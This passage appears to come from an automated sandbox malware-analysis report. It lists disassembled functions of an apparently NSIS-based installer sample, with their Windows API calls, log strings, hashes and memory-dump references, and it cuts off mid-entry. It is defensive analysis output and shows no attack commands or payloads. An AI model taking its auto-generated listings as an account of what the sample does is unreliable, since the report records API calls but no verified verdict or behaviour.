                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                  • String ID: @%F$N$open
                                                                                  • API String ID: 3928313111-3849437375
                                                                                  • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                  • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                  • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                  • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                  Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                  • wsprintfA.USER32 ref: 00406B4D
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                  • String ID: F$%s=%s$NUL$[Rename]
                                                                                  • API String ID: 565278875-1653569448
                                                                                  • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                  • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                  • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                  • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                  • String ID: F
                                                                                  • API String ID: 941294808-1304234792
                                                                                  • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                  • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                  • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                  • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                  • API String ID: 1641139501-220328614
                                                                                  • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                                  • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                  • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                                  • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                  Strings
                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                  • API String ID: 3294113728-3145124454
                                                                                  • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                  • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                  • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                                  • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                  Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                  • API String ID: 3734993849-2769509956
                                                                                  • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                  • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                  • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                  • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                  Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                  • GetSysColor.USER32(?), ref: 00403E2B
                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                  • DeleteObject.GDI32(?), ref: 00403E55
                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2320649405-0
                                                                                  • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                  • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                  • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                  • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                  Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                  Strings
                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                  • API String ID: 1033533793-945480824
                                                                                  • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                  • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                  Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                  • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 2740478559-0
                                                                                  • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                  • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                  Strings
                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                  • API String ID: 2014279497-3433828417
                                                                                  • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                  • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                  Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                  • GetMessagePos.USER32 ref: 00404871
                                                                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Send$ClientScreen
